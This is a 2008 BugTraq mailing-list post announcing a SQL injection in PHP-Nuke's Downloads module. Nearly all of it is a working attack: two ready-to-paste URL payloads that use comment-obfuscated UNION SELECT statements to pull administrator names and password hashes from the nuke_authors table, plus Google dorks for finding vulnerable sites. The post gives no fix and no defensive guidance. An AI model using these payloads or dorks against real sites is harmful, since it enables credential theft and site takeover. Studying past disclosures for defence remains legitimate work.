BugTraq
PHP-Nuke Module Downloads SQL Injection(sid) Feb 21 2008 04:30PM
hackturkiye hackturkiye gmail com
###############################################################

#

# PHP-Nuke Module Downloads SQL Injection(sid)

#

###############################################################

#

# AUTHOR : S@BUN

#

# HOME : http://www.milw0rm.com/author/1334

#

# MAİL : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

################################################################

#

# DORK 1 : allinurl: sid "modules php name Downloads"

#

# DORK 2 : allinurl: sid"d_op=viewsdownload"

#

################################################################

EXPLOIT :

admin =

modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funio
n%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%2
0admin%201%200%202

pass=

modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funio
n%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%2
0admin%201%200%202

################################################################

# S@BUN i AM NOT HACKER S@BUN

################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus